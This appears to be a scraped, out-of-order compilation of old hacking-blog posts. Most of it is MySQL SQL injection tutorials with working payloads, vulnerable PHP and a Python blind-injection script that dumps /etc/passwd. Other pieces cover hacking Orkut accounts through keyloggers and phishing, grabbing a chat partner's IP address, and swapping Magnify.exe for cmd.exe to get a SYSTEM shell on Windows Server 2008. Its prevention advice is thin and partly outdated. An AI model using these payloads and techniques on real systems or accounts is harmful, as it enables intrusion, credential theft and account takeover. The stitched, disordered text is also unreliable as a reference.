SUBSTR() is a synonym for SUBSTRING().

mysql> select substring('Blind SQL', 1, 1);
----------------------------
| substring('Blind SQL', 1, 1) |
----------------------------
| B                                  |
----------------------------

mysql> select substring('Blind SQL', 2, 1);
----------------------------
| substring('Blind SQL', 2, 1) |
----------------------------
| l                                   |
----------------------------

- LOWER(str)

Returns the string str with all characters changed to lowercase according to
the current character set mapping. The default is latin1 (cp1252 West European).

mysql> SELECT LOWER('SQL');
----------------
| LOWER('SQL') |
----------------
| sql               |
----------------

- UPPER(str)

Returns the string str with all characters changed to uppercase according to
the current character set mapping. The default is latin1 (cp1252 West European).

mysql> SELECT UPPER('sql');
--------------
| UPPER('sql') |
--------------
| SQL           |
--------------

Now we have understood the principals MySQL functions that could be used while
trying to do a Blind SQL Injection attack. (consult MySQL reference manuals for others)

What we need again? Suppose that we know for a moment the admin password: "secret".

mysql> select ascii('s');
-----------
| ascii('s') |
-----------
|        115|
-----------

mysql> select ascii('e');
-----------
| ascii('e') |
-----------
|        101|
-----------

mysql> select ascii('c');
-----------
| ascii('c') |
-----------
|         99 |
-----------

mysql> select ascii('r');
-----------
| ascii('r') |
-----------
|        114|
-----------

mysql> select ascii('t');
-----------
| ascii('t') |
-----------
|        116|
-----------

It's time to watch the source code:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

[ ... ]

$SQL = "select * from news where id=".$_GET['id']." LIMIT 1";

$result = mysql_query($SQL);

if (!$result) {
  die('Invalid query: ' . mysql_error());
}

[ ... ]

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

Now, try to "exploit the bug" by requesting this URL:
http://www.victim.net/CMS/view.php?id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1)) = 115

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

The query is TRUE (we know that the first letter of the password is 's') and therefore, the query will be:

SELECT * FROM news WHERE id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1)) = 115 LIMIT 1

What is the number 115? Read upon is the ascii value of the 's'. We retrieved the first character
of the password (by using some MySQL functions).

.:. (SELECT pwd FROM usr WHERE id=1) => SELECT the password of the user with ID=1 (admin)
.:. (SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1) => Get the first letter of the password (in this case 's')
.:. ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1)) => Get the ASCII code of the first letter (115 in this case)

And how to retrieve the second letter of the password? Just carry out this query:

SELECT * FROM news WHERE id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),2,1)) = 101 LIMIT 1

by requesting this URL:
http://www.victim.net/CMS/view.php?id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),2,1)) = 101

The third character? And the others? Just make the same query with the right values.
Take in mind that you can also use the "greater then" (>) and "less then" (<) symbols instead of the equal; to find the ASCII letter between a range of letters. Eg.: between 100 and 116; and so on. -------------------------------------------------------------------------------[/]  ---[ 0x07: Double Query ]  Sometimes in some codes happends that a programmer use the MySQLi Class (MySQL Improved Extension) that is an extension allows you to access to the functionality provided by MySQL 4.1 and above.  I'll explain a  very interesting bug that could be very dangerous for the system. A not properly sanitized variable passed in the method called multi_query of the mysqli class can be used to perform a "double" sql query injection.  mysqli_multi_query (PHP 5) is able to performs one or more queries on the database selected. The queries executed are concatenated by a semicolon.  Look this example to know what I'm talking about:  -/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/  multi_query($query)) {
  do {
      /* the first result set */
      if ($result = $mysqli->store_result()) {
          while ($row = $result->fetch_row()) {
              echo " - " .$row[0]. "
" ;
          }
          $result->free();
      }
      /* print divider */
      if ($mysqli->more_results()) {
          echo "/-/-/-/-/-/-/-/-/-/-/-/-/-/
";
      }
  } while ($mysqli->next_result());
}

/* close connection */
$mysqli->close();
?>

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

If a user request the follow URL:

http://www.victim.net/CMS/multiple.php?id=2

The browser reply with this information:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

UserName: - ad
/-/-/-/-/-/-/-/-/-/-/-/-/-/
- could be bypassed easily?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

But the source code is bugged. The $query variable is vulnerable because
a user can supply using the GET method, an evil id and can do multiple (evil) queries.

Trying with this request:

http://localhost/apache2-default/multiple1.php?id=2; SELECT pwd FROM usr/*

We will obtain the users passwords.

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

UserName: - ad
/-/-/-/-/-/-/-/-/-/-/-/-/-/
- secret
- adpwd
- test

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/
-------------------------------------------------------------------------------[/]

---[ 0x08: Filters Evasion ]

Web Application could implements some input filters that prevent an attacker from
exploiting certain flaws such as SQL Injection, LFI or whatever. Therefore an application
can use some mechanism that are able to sanitize, block or parse in some ways
user-supply data. This kind of filters could be bypassed by using differents methods,
here I wanna try to give to you some ideas; but certainly one filter differ from
an other one so, you have to try/find different methods to bypass it.

- Imagine that we have to bypass a login form; but the comment symbol is blocked,
we can bypass this issue but injecting this data ' OR 'a' = 'a instead of ' OR 1 = 1 /*

- The filter try to prevent an SQL Injection by using this kind of Signature: ' or 1=1 (Case-insensitive).
An attacker can bypass this filter using ' OR 'foobar' = 'foobar for example.

- Suppose that the application filter the keyword "admin", to bypass this filter we have just
to use some MySQL functions such as CONCAT or CHAR for example:
union select * from usr where user = concat('adm','in')/*
union select * from usr where user=char(97,100,109,105,110)/*

This is only a little part of "filter evasion techniques". Different filters work
differently, I can't stay on this topic forever; I just gave to you some ideas.
-------------------------------------------------------------------------------[/]

---[ 0x09: SQL Injection Prevention ]

How to prevent this type of attacks? Here below I just wanna write some
tips that you can use to make your web application more secure.

1.) The file php.ini located on our HD (/etc/php5/apache2/php.ini, /etc/apache2/php.ini,
and so on..) can help us with the magic quote functions. Other interesting functions can
be setted to On; take a look inside this file.

Magic quotes can be used to escape automatically with backslash the user-supply single-quote ('),
double-quote ("), backslash (\) and NULL characters.
The 3 magic quotes directives are:

- magic_quotes_gpc, that affects HTTP request data such as GET, POST and COOKIE.
- magic_quotes_runtime, if enabled, most functions that return data from an external source, will have
quotes escaped with a backslash.
- magic_quotes_sybase, that escape the ' with '' instead of \'.

2.) deploy mod_security for example

3.) use functions such as addslashes() htmlspecialchars(), mysql_escape_string(), etc. to validate
every user inputs.

4.) For integer input validate it by casting the variable
-------------------------------------------------------------------------------[/]

---[ 0x10: Conclusion ]

Here we are, at the end of this paper. As said upon, I hope you enjoyed it and
lets hack
-------------------------------------------------------------------------------[/]

MySQL: Secure Web Apps - SQL Injection techniques Part 1

Hi everybody! I'm here again to write a little, but I hope interesting, paper concerning
Web Application Security. The aim of these lines are to help you to understand security
flaws regarding SQL Injection.

I know that maybe lots of things here explained are a little bit old; but lots of people
asked to me by email how to find/to prevent SQL Injection flaws in their codes.

Yes, we could say that this is the second part of my first paper regarding PHP flaws
(PHP Underground Security) wrote times ago; where I explained in a very basic form the SQL Injection
(The reason? The focus was on an other principal theme).

How I wrote this paper? In my free time, a couple of lines to help people to find, prevent
this kind of attacks. I hope you enjoy it. For any question or whatever please
contact me here: omni_0 [at] yahoo [DOT] com .
-------------------------------------------------------------------------------[/]

---[ 0x02: Injecting SQL ]

As you know almost every dynamic web applications use a database (here we talk
about web application based on "LAMP architecture") to store any kind of data needed
by the application such as images path, texts, user accounts, personal information,
goods in stock, etc.

The web application access to those information by using the SQL (Structured Query
Language). This kind of applications construct one or more SQL Statement to query
the DataBase (and for example to retrieve data); but this query sometimes incorporporate
user-supplied data. (take in mind this)

What about SQL? SQL is a DML (Data Manipulation Language) that is used
to insert, retrive and modify records present in the DataBase.

As I said before web application uses user-supplied data to query the DB but if the
supplied data is not properly sanitized before being used this can be unsafe and
an attacker can INJECT HIS OWN SQL code.
These flaws can be very destructive because an attacker can:

- Inject his data
- Retrive information about users, CC, DBMS.. (make a kind of information gathering)
- and so on..

The fundamentals of SQL Injection are similar to lots of DBMS but, as you know
there are some differences, in this paper I will cover "Exploting SQL Injection
in MySQL DBMS" as said upon (this means that if you want to test techniques here
explained on others DBMS you need to try at your own).
-------------------------------------------------------------------------------[/]

---[ 0x03: Exploiting a Login Form ]

Sometimes happends that coders doesn't properly sanitize 2 important variables
such as user-name and password in the login form and this involve a critical
vulnerability that will allow to the attacker the access to a reserved area.

Let's make an example query here below:

SELECT * FROM users WHERE username = 'admin' and password = 'secret'

With this query the admin supply the username 'admin' and the password 'secret'
if those are true, the admin will login into the application.
Let us suppose that the script is vulnerabile to sql injection; what happends
if we know the admin username (in this case 'admin')? We don't know the password, but
can we make an SQL Injection attack? Yes, easily and then we can gain the access to the application.
In this way:

SELECT * FROM users WHERE username = 'admin' /*' and password = 'foobar'

So, we supplied this information:

- As username = admin' /*
- As password = foobar (what we want..)

Yes, the query will be true because admin is the right username but then with the
' /* ' symbol we commented the left SQL Statement.

Here below a funny (but true) example:

$sql = "SELECT permissions, username FROM $prefix"."auth WHERE
username = '" . $_POST['username'] . "' AND password = MD5('".$_POST['wordpass']."');";

 $query = mysql_query($sql, $conn);

The variables passed with the POST method are not properly sanitized before being used
and an attacker can inject sql code to gain access to the application.
This is a simple attack but it has a very critical impact.
-------------------------------------------------------------------------------[/]

---[ 0x04: Exploiting Different SQL Statement Type ]

SQL Language uses different type of statements that could help the programmer to
make different queries to the DataBase; for example a SELECTion of record,
UPDATE, INSERTing new rows and so on. If the source is bugged an attacker can
"hack the query" in multiple ways; here below some examples.

SELECT Statement
------------------

SELECT Statement is used to retrieve information from the database; and is
frequentely used "in every" application that returns information in response
to a user query. For example SELECT is used for login forms, browsing catalog, viewing
users infos, user profiles, in search engines, etc. The "point of failure" is
often the WHERE clause where exactly the users put their supplied arguments.

But sometimes happends that the "point of failure" is in the FROM clause; this
happends very rarely.

INSERT Statement
------------------

INSERT statement is used to add new row in the table; and sometimes the application
doesn't properly sanitize the data, so a query like the beneath could be vulnerable:

INSERT INTO usr (user, pwd, privilege) VALUES ('new', 'pwd', 10)

What happends if the pwd or username are not safe? We can absolutely "hack the
query" and perform a new interesting query as shown below:

INSERT INTO usr (user, pwd, privilege) VALUES ('hacker', 'test', 1)/*', 3)

In this example the pwd field is unsafe and is used to create a new user with
the admin privilege (privilege = 1):


   $SQL= "INSERT INTO usr (user, pwd, id) VALUES ('new', '".$_GET['p']."', 3)";

   $result = mysql_query($SQL);
  
  
UPDATE Statement
------------------

UPDATE statement is used (as the word says) to UPDATE one or more records.
This type of statement is used when users (logged into the application) need
to change their own profile information; such as password, the billing address,
etc. An example of how the UPDATE statement works is shown below:

UPDATE usr SET pwd='newpwd' WHERE user = 'billyJoe' and password = 'Billy'

The field pwd in the update_profile.php form is absolutely "a user-supply data"; so,
try to imagine what happends if the code is like the (vulnerable) code pasted below:

   $SQL = "UPDATE usr SET pwd='".$_GET['np']."' WHERE user = 'billyJoe' and pwd = 'Billy'";
   $result = mysql_query($SQL);

In this query the password needs to be correct (so, the user needs to know his own password :D)
and the password will be supplied with the GET method; but leave out this detail (it's not so important
for our code injection) and concentrate to the new password field (supplied by $_GET['np'], that
is not sanitized); what happeds if we will inject our code here? Let see below:

UPDATE usr SET pwd='owned' WHERE user='admin'/*' WHERE user = 'ad' and pwd = 'se'

here we just changed the admin password to ' owned ' :) sounds interesting right?

UNION SELECT Statement
-------------------------

The "UNION SELECT Statement" is used in SQL to combine the results of 2
or more different SELECT query; obviously in one result.
This kind of statement is very interesting because when you have a SELECT query
often you can add your own UNION SELECT statement to combine the queries (sure,
only if you have a "bugged sql statement") and view the 2 (or more) results in only
one result set. To better understand what I mean I think is better to see an interesting
example and put our hands on it.

Here is our vulnerable code:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

$SQL = "select * from news where id=".$_GET['id'];

$result = mysql_query($SQL);

if (!$result) {
   die('Invalid query: ' . mysql_error());
}

// Our query is TRUE
if ($result) {
echo '

WELCOME TO www.victim.net NEWS
';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
  
   echo '
Title:'.$row[1].'
';
   echo '
News:
'.$row[2];
}

}

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

As we can see the $SQL variable is vulnerable and an attacker can inject his own
code into it and then gain interesting information. What happends if via browser we
call this URL: http://www.victim.net/CMS/view.php?id=1 ?

Nothing interesting, just our news with the ID equal to 1, here below:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

How to make this interesting? :) We can use our UNION SELECT operator, and the
resultant query will be:

select * from news where id=1 UNION SELECT * FROM usr WHERE id = 1

What is gonna happend? Look below:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?
Title:secret

News:
1

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

"Title: secret" is the admin password (ID = 1 is the admin in most cases) and the 1 in the "News:"
is the admin ID. So, why our output is so strange? This is not strange our tables has been made
in different ways. Just to make things clear look the tables below:

mysql> select * from usr;
-----------------------
| user   | pwd    | id    |
-----------------------
| admin | secret |    1 |
-----------------------
| ad     | aaaaa  |    2 |
-----------------------
| new   | test    |    5 |
-----------------------

mysql> select * from news;
---------------------------------------------------
| id   | title                | texts                              |
---------------------------------------------------
|    1 | testing news    | what about SQL Injection? |
---------------------------------------------------
|    2 | testing news 2 | could be bypassed easily?  |
---------------------------------------------------

Our UNION SELECT query will be:

mysql> select * from news where id = 1 union select * from usr where id = 1;
---------------------------------------------------
| id      | title              | texts                            |
---------------------------------------------------
| 1       | testing news | what about SQL Injection? |
---------------------------------------------------
| admin | secret          | 1                                   |
---------------------------------------------------

Is now clear? We have found the admin password. It's great!

Ok, lets go deeper; what happends if we have 2 tables with a different number of
columns? Unfortunaltely UNION SELECT doesn't work as show upon. I want to make
2 different examples to help you.

LESS FIELDS
------------

mysql> select * from Anews;
------------------------------------------------
| title               | texts                                  |
------------------------------------------------
| testing news 2 | could be bypassed easily?      |
------------------------------------------------

mysql> select * from Anews union select * from usr;
ERROR 1222 (21000): The used SELECT statements have a different number of columns

Yes, this is what happends if the UNION SELECT is used and the tables have a different
number of columns. So, what we can do to bypass this?

mysql> select * from Anews union select id, CONCAT_WS(' - ', user, pwd) from usr;
--------------------------------------------
| title          | texts                                  |
--------------------------------------------
| testing news 2 | could be bypassed easily? |
--------------------------------------------
| 1                   | admin - secret                |
--------------------------------------------
| 2                  | ad - aaaaa                      |
--------------------------------------------
| 5                 | new - test                       |
--------------------------------------------

We bypassed "the problem" just using a MySQL function CONCAT_WS (CONCAT can be used too).
Take in mind that different DBMS works in different way. I'm explaining in a general manner; therefore
sometimes you have to find other ways. :)

MORE FIELDS
-------------

mysql> select * from fnews;
--------------------------------------------------------
| id   | pri   | title               | texts                             |
--------------------------------------------------------
|    1 |    0 | testing news 2 | could be bypassed easily? |
--------------------------------------------------------

What we can do now? Easy, just add a NULL field!!

mysql> select * from fnews union select NULL, id, user, pwd from usr;
---------------------------------------------------------
| id   | pri     | title               | texts                             |
---------------------------------------------------------
|    1 |    0   | testing news 2 | could be bypassed easily? |
---------------------------------------------------------
| NULL |    1 | admin             | secre                            |
---------------------------------------------------------
| NULL |    2 | ad                 | aaaaa                            |
---------------------------------------------------------
| NULL |    5 | new               | test                              |
---------------------------------------------------------

-------------------------------------------------------------------------------[/]

What to do when your Orkut Account is Hacked ?

It can be a nightmare if someone else takes control of your Google Account because all your Google services like Gmail, Orkut, Google Calendar, Blogger, AdSense, Google Docs and even Google Checkout are tied to the same account.

Here are some options suggested by Google Support when your forget the Gmail password or if someone else takes ownership of your Google Account and changes the password:

1. Reset Your Google Account Password:
Type the email address associated with your Google Account or Gmail user name at google.com/accounts/ForgotPasswd - you will receive an email at your secondary email address with a link to reset your Google Account Password. This will not work if the other person has changed your secondary email address or if you no longer have access to that address.

2. For Google Accounts Associated with Gmail:
If you have problems while logging into your Gmail account, you can consider contacting Google by filling this form. It however requires you to remember the exact date when you created that Gmail account.

3. For Hijacked Google Accounts Not Linked to Gmail:
If your Google Account doesn’t use a Gmail address, contact Google by filling this form. This approach may help bring back your Google Account if you religiously preserve all your old emails. You will be required to know the exact creation date of your Google Account plus a copy of that original “Google Email Verification” message.It may be slightly tough to get your Google Account back but definitely not impossible if you have the relevant information in your secondary email mailbox.

How To Hack Orkut ???

Google uses a 4 Level Orkut login which makes it difficult to hack Orkut using brute force attack.

First Level - Security-SSL or 128 bit secured connection

Second Level - Google account checks for cookie in the sytem of user

Third Level - Google provides a redirection to the entered User information

Fourth Level - Google doesn’t use conventional php/aspx/asp coding. So it is impossible to hack Orkut using input validation attack!!!

It is not an easy task to hack Orkut by breaking this security! But still some people manages to get access to other’s Orkut accounts. The question concerned is How they do it? Many of them just use simple tricks that fool users and then they themself leak out their password. Here are some points you need to take care of, to protect your Orkut account being hacked.

Common Ways to Hack Orkut

1. Using Keyloggers is one of the Easiest Way to Hack an Orkut (or any other email) password. Keylogger programs can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden.

A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a hardware device or small program that monitors each keystroke a user types on a specific computer’s keyboard. Keylogger is the easiest way to hack an Orkut account.

A keylogger program is widely available on the internet. Some of the best ones are listed below

Win-Spy Monitor

Realtime Spy

A detailed information on Keylogger Hack can be found in my post Hacking an Email Account.

2. Phishing Attack is the most popular way of hacking/stealing other’s password. By using fake login pages it is possible to hack Orkut. Here the users land on a page where they are asked for their login information and they enter their Orkut username and password thinking it to be a real page but actually it is other way round. It submits all the entered details to the creator of the fake login page.

3. Orkut New Features: I have come across a page(fake page) that looks like they are giving the user a choice of selecting new features for orkut with your ID and password, of course!! When the user submit’s his/her Orkut login information through this page, there goes his ID and password mailed to the coder.

4. Community Links: Many times you are provided with a link to a community in a scrap. Read the link carefully, It may be something like http://www.okrut.com/Community.aspx?cmm=22910233 OKRUT not ORKUT. This is definitely a trap created by the hacker to hack your Orkut password. Clicking on this link will take you to a fake login page and there you loose up your password.

5. Java script: You must have seen the circulating scraps that asks you to paste this code in your address bar and see what happens! Well sometimes they also leak out your information. Check the code and if you are unsure of what to do, then I recommend not to use it. So be careful, javascripts can even be used to hack Orkut!

6. Primary mail address: If by some means a hacker came to know the password of your Yahoo mail or Gmail, which users normally keeps as their primary mail address in their Orkut account, then hacker can hack Orkut account by simply using USER ID and clicking on ‘forget password’. This way Google will send link to the already hacked primary email ID to change the password of the Orkut account. Hence the email hacker will change your Orkut account’s password. Hence your, Orkut account is hacked too.

So a better thing would be to keep a very unknown or useless email ID of yours as primary email id so that if the hacker clicks on ‘Forgot password’ the password changing link goes to an unknown email id i.e. not known to the hacker. Hence your Orkut account saved.

So, I hope that this post not only teaches you to hack Orkut but also to hack protect your Orkut account.

Hacking Yahoo Messenger

This tutorial will tell you how to hack yahoo messenger while you are engaged in chatting with some person.While you are chatting through yahoo messenger, Yahoo will hide the IP addresses of all the computers that are connected through the yahoo messenger application to the chat room.So it is not possible to directly find out the IP of the person you want to hack.Then how to get the IP address? Yes it is still possible to hack the IP address during the Yahoo messenger chat.The procedure to Hack Yahoo messenger is discussed in detail below.

While you are chatting via yahoo messenger the communication between you and the person you want to hack, takes place indirectly via Yahoo server and not directly.It is not possible to hack Yahoo messenger directly to get the IP address.So to hack his IP, you must establish a direct communication with him.So,how to do this? It’s easy.Just start chatting with some one via Yahoo messenger.During the process of chatting send him a big file.Now the file transfer takes place directly between your computer and the victim’s computer(via yahoo messenger application).So now, you are ready to go. Here’s the step-by-step process to hack Yahoo messenger and get the IP address of the person .

• Goto the COMMAND PROMPT (START>>>RUN>>>Type CMD).



• Here Type “netstat -n” (without quotes).

NOTE: If you are new to “netstat” and other IP related commands refer this tutorial:Windows XP IP Utilities

• The pic given below shows netstat results of my computer.I was not chatting when i took this pic and hence it looks modified.

 

• Here local address is your own IP and the foreign address is the IP address of the recipient with whom you are connected via yahoo messenger (There may be multiple recipients and hence multiple foreign addresses).


• Now send him the file.



• Check the output by typing the command “netstat -n” (without quotes).


• Assume the output is something like this.

 

TCP 127.0.0.10:5101 124.55.23.11:1246 ESTABLISHED

Here 124.55.23.11 is the IP address of the person with whom you are chatting and 1246 is the port number where connection is established.That’s It! You have now hacked Yahoo messenger to get his IP address.

Once you hack Yahoo messenger and get his IP address you can use any of the Remote Administration tools or perform NETBIOS HACKING.Refer this tutorial on Netbios Hacking.

NOTE: Some times there are chances where in the file transfer gets encrypted (takes place via yahoo server itself).So in this case the above hack may fail to work.

Cyber Protest TEAM - STAR TV Ana HABER - 1nd0-turkish hacker

If you sense that you or someone on the site may be in danger, contact your local security enforcement authorities. If the danger is immediate and urgent - such as a specific threat of serious harm - call the irfanmerdeka.blogspot.com !!!





MONITOR YOUR PC AND SERVER WHOOOOOOAAAAA :p

Bypassing Windows Server 2008 Password Protection

Introduction
Windows Server 2008 is the most recent operating system release for Microsoft Windows Server line. It is based on Windows NT 6.0 SP1 kernel, like Windows Vista; therefore it shares much of the same architecture and technology as Windows Vista including new futures such as security, management and administrative futures.
Although very secured compared to earlier versions it can be bypassed quite easily having physical access to the machine.

In addition to security, memory protection mechanisms are available such as GS, SafeSEH, Heap protection, DEP and ASLR which are beyond the scope of this paper.
Bypassing Windows Server 2008 Password Protection
In this paper we will demonstrate a simple and effective way to bypass Windows Server 2008 password protection in the case where we have forgotten the password or it has been changed by a third party and we have to get access to our system.
* Note: Do NOT use this approach to backdoor any server in your work environment
Tools
PING (Partimage Is Not Ghost)
Download: http://ping.windowsdream.com/ping/Releases/3.00.01/PING-3.00.iso (~22MB)
Demonstration
To be able to bypass the password protection we will need first to boot with PING cd or any other bootable live Linux distribution that supports NTFS-3G driver (NTFS-3G is a cross-platform implementation of the Windows NTFS file system that supports read/write capabilities).
We first check which partition is the Windows NTFS partition which in our example is /dev/sda1.
fdisk –l | grep NTFS
Then we create the directory where we will mount the windows files :
mkdir –p /mnt/windows
Therefore, we mount with NTFS-3G driver the windows partition to /mnt/windows folder:
mount –t ntfs-3g /dev/sda1/mnt/windows
Now we do the trick by replacing some executable files with cmd.exe which in our demonstration would be the Magnify.exe tool that can be found on Password Protection screen under Ease of Access options.
mv Magnify.exe Magnify.bck
cp cmd.exe Magnify.exe
After we do the changes described above we restart the machine and boot back to Windows Server 2008.
4
As we can see in the snapshot below under Ease of Access we have the option to select the Magnifier tool and give ourselves a command prompt with NT AUTHORITY/SYSTEM privileges on the system
5
The following approach can be used with Windows Vista and also by any other Ease of Access tools or even by Ease of Access itself by renaming “utilman.exe” to “cmd.exe”.
Conclusion
I hope you may find the following paper useful and keep it for your reference in case you have forgotten your Windows Server 2008 / Vista password.
The above paper has been written from an article I wrote for IT Solutions Knowledge Base website which I think you might find usefull for your everyday IT Solutions.

Practical SQL Injection: bit by bit

I hear you already thinking: yet another paper on SQL injection. In fact it is, but this time, the
injection was a bit more tricky to exploit than usual. I though it deserved a short paper.
1. Introduction
While auditing some network, I end up on a CMS which was self-developed by the client. One of
the function of this CMS (surprisingly) was to ease the publication of files on the website. In this
CMS, each documents are identified by a number. From this identification number, the URL to the
associated document is generated. If the document exists, the user is redirected to it, else the user is
redirected to an error page.
>> Getting http://host/getdocument.php?id=0
<< header: Location: http://host/documents/identity_en.pdf
>> Getting http://host/getdocument.php?id=22
<< header: Location: http://host/error404.php
2. Understanding the injection
The injection by itself is pretty standard. The id variable is not sanitized before being used in the SQL
request.
>> Getting http://host/getdocument.php?id='
<< header: Location: http://host/error404.php
<< Warning: mysql_num_rows(): supplied argument is not a valid MySQL
<< result resource in >> /var/www/html/getdocument.php on line 8
Quickly reconstructing the SQL statement, the executed query seems to fetch two rows from the table:
the name as a varchar and the language of the document represented by an integer.
>> Getting http://host/getdocument.php?id=22 UNION SELECT 'A',0
<< header: Location: http://host/error404.php
Following the investigation, it seems as well that the page is checking if the document exists in
the web root directory. A directory traversal is sense less in this case since the script seems to only
generate an URL and is not retrieving the document content.
>> Getting http://host/getdocument.php?id=22 UNION SELECT 'identity',0
Practical SQL Injection: bit by bit
2
<< header: Location: http://host/documents/identity_en.pdf
Inspecting the language field, two are available: 0 for english, 1 for german. Any other values lead to
a german document.
>> Getting http://host/getdocument.php?id=22 UNION SELECT 'identity',1
<< header: Location: http://host/documents/identity_de.pdf
>> Getting http://host/getdocument.php?id=22 UNION SELECT 'identity',2
<< header: Location: http://host/documents/identity_de.pdf
To summarize, we can’t use the name field to retrieve data. If we paste a filename we know it exists,
we will end up with an URL containing the filename we already know about. Not really useful.
However we can change the language of the document and that’s getting interesting.
3. Exchanging data
As we have seen, the only way to get something modified on the page is through the language and we
have only two possibilities: en or de. Sounds familiar? We are going to read data from the database bit
by bit. To make sure the concept is working, we will try to get back a value we sent ourselves.
Character A has for ascii code 0x41 which is represented by 01000001 in binary. Assuming that
en represents bit value 0 and that de represents bit value 1, reading the first bit of A should set the
language to en, reading the second bit should set the language to de.
>> 22 UNION SELECT 'identity',(SELECT ASCII('A') >> 7 & 1)
<< header: Location: http://host/documents/identity_en.pdf
>> 22 UNION SELECT 'identity',(SELECT ASCII('A') >> 6 & 1)
<< header: Location: http://host/documents/identity_de.pdf
If we are looping from 7 to 0, we should retrieve all bits and therefore our character A back.
Responses Binary Ascii letter
en,de,en,en,en,en,en,de 01000001 A
4. Automizing the process
All we need to do is to loop from n to 0 to get a value of n bits. To get a full string, we first need to get
its length (32 bits to get a value big enough), and then we need loop over each bytes. A bit of scripting
can be quickly arranged to do the work for us.
#!/usr/bin/python -i
# -*- coding: utf-8 -*-
# -*- Mode: python -*-
import sys
import urllib2
import re
import rlcompleter, readline
readline.parse_and_bind("tab: complete")
class SqlInjectionBitByBit(object):
def __init__(self, url, start, end, bitpattern):
self.__url = url
Practical SQL Injection: bit by bit
3
self.__start = start
self.__end = end
self.__bitpattern = bitpattern
def __send(self, params):
""" Send the query and return response header values + response content. """
http = urllib2.HTTPHandler()
query = self.__start + params + self.__end
req = urllib2.Request(self.__url + urllib2.quote(query))
resp = http.http_open(req)
data = "\n".join([resp.info().get(i) for i in resp.info()])
data += "\n" + "".join([repr(x) for x in resp])
return data
def __getBit(self, data):
""" Get the bit value from the server response. """
try:
bit = re.findall(self.__bitpattern[0] % (self.__bitpattern[1],
self.__bitpattern[2]), data)
if bit[0] == self.__bitpattern[1]: return '0'
elif bit[0] == self.__bitpattern[2]: return '1'
except IndexError: raise RuntimeError
except TypeError: raise RuntimeError
def __getValue(self, val, n=8):
""" Get a single value, default 8 bits. """
byte = ""
for bit in range(n-1,-1,-1):
a = self.__getBit(self.__send("(%s >> %d & 1)" % (val, bit)))
byte += a
return int(byte, 2)
def __getLength(self, content):
""" Return the length of the MySQL server response. """
return self.__getValue("LENGTH(%s)" % content, 32)
def __getString(self, content):
""" Return the response from the MySQL server. """
length = self.__getLength(content)
for i in xrange(length+1):
yield chr(self.__getValue("ASCII(SUBSTR(%s,%d,1))" % (content, i)))
def query(self, query):
""" Return the response from the query. """
try:
for i in self.__getString("(%s)" % (query)): yield i
except RuntimeError:
yield "SQL error."
raise StopIteration
def printr(data):
for x in data:
sys.stdout.write(x)
sys.stdout.flush()
print ""
We can try to retrieve our first data from the database. Using the class SqlInjectionBitByBit is really
simple. First argument is the vulnerable URL, the second is the beginning of the SQL query and the
third is the end. The last argument is a list representing the regular expression to catch the bit from the
Practical SQL Injection: bit by bit
4
server response and their according values. The method query is a generator used to read the value we
want to retrieve. As we proceed bit by bit, the printr() function will display each bytes in real time.
>>> q = SqlInjectionBitByBit("http://host/getdocument.php?id=",
... "20 UNION SELECT 'identity',",
... " -- ",
... ["identity_(%s|%s)\.pdf", "en", "de"])
>>> printr(q.query("@@version"))
5.0.45
The magic is operating and we can perform full queries.
>>> printr(q.query("SELECT LOAD_FILE('/etc/passwd')"))
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
